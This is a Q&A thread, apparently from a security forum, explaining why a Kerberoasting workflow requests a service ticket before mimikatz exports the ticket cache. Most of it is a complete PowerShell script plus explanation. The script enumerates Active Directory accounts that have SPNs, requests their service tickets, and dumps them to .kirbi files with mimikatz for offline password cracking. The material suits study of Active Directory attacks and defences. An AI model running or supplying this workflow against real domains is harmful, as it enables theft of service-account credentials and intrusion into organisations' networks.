
I am learning Kerberoasting; below are the steps that I am following.

Step 1: The attacker finds the SPNs.
Step 2: After identifying one, we request a TGS for that SPN. This is the script for that:

    # load the assembly that exposes the Kerberos requestor token
    Add-Type -AssemblyName System.IdentityModel
    # requesting the token makes the LSA obtain (and cache) a service ticket for the SPN
    New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "<your SPN>"

Step 3: Export it to local disk: kerberos::list /export (in mimikatz)

Step 4: Crack it.

Now, I don't understand why the 2nd step is necessary. When I skip it and go directly to the 3rd step, the results are the same. So why do we need it?

  • You can't export a ticket that doesn't exist yet. All mimikatz is doing is dumping the Kerberos ticket cache. Step 2 requests a ticket to the service you care about so the cache is primed. – Steve May 03 '19 at 23:00
  • Okay! So when I followed all the steps, PowerShell imported all the tickets and placed them into memory. Then we ask mimikatz to bring them to local disk, but mimikatz also keeps a local cache, so next time we can request them directly, with no need for the PowerShell step? Am I right? – Utkarsh Agrawal May 04 '19 at 07:29

1 Answer


Sometimes it might happen that the tickets are not cached in memory, and so they will not be retrieved by mimikatz. So, to retrieve the ticket for the SPN, the second step will help in retrieving the tickets for the specified SPN if they are not already cached.
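The point of the answer is that mimikatz only dumps what is already in the logon session's ticket cache. The following added example (not code from the question or the answer) walks the four steps on a domain-joined Windows host and checks the cache with klist before and after the request, so you can see step 2 doing its job. The SPN MSSQLSvc/sql01.corp.local:1433, the domain name, and the mimikatz.exe path are placeholders; the Test-CachedTicket helper is my own.

```powershell
# Added example, not from the original post. Run as a domain user on a
# domain-joined host. The SPN and the mimikatz path below are placeholders.

# Step 1: enumerate user accounts that carry an SPN (the Kerberoastable set).
# An ADSI DirectorySearcher is used so the RSAT ActiveDirectory module is not needed.
$searcher = New-Object System.DirectoryServices.DirectorySearcher
$searcher.Filter = '(&(objectCategory=user)(servicePrincipalName=*)(!(sAMAccountName=krbtgt)))'
$null = $searcher.PropertiesToLoad.AddRange([string[]]@('sAMAccountName', 'servicePrincipalName'))
$spnAccounts = $searcher.FindAll() | ForEach-Object {
    [pscustomobject]@{
        Account = $_.Properties['samaccountname'][0]
        SPNs    = @($_.Properties['serviceprincipalname'])
    }
}
$spnAccounts | Format-Table -AutoSize

# Helper (assumed, not part of the original steps): does the current logon
# session's ticket cache already hold a ticket for this SPN? klist.exe prints
# one "Server:" line per cached ticket, so a plain substring match is enough.
function Test-CachedTicket {
    param([Parameter(Mandatory)][string]$Spn)
    $cache = & klist.exe 2>$null
    return [bool]($cache | Select-String -SimpleMatch $Spn -Quiet)
}

$targetSpn = 'MSSQLSvc/sql01.corp.local:1433'   # placeholder SPN from step 1's output
"Cached before request: $(Test-CachedTicket -Spn $targetSpn)"   # normally False

# Step 2: ask the LSA for a service ticket to that SPN. Building the requestor
# token triggers a TGS-REQ to the KDC; the resulting ticket lands in the cache
# whether or not you ever use the token object.
Add-Type -AssemblyName System.IdentityModel
$token = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $targetSpn
"Cached after request:  $(Test-CachedTicket -Spn $targetSpn)"   # now True
"Ticket valid until:    $($token.ValidTo)"

# Step 3: dump the cache to .kirbi files. mimikatz reads the same cache that
# klist shows, which is why a service you have never contacted is missing
# unless step 2 ran first. Path to mimikatz.exe is a placeholder.
& 'C:\tools\mimikatz.exe' 'kerberos::list /export' 'exit'

# Step 4 (not shown): convert the exported .kirbi for the SPN's account to a
# crackable hash format and crack it offline.
```

If you want the comparison the question describes, run the script once with the step 2 block commented out: klist will not list the SPN, and the exported .kirbi files will contain only tickets for services the session had already talked to (typically krbtgt and LDAP/CIFS on a domain controller), which is what makes the results look the same when those are the only tickets you were looking at.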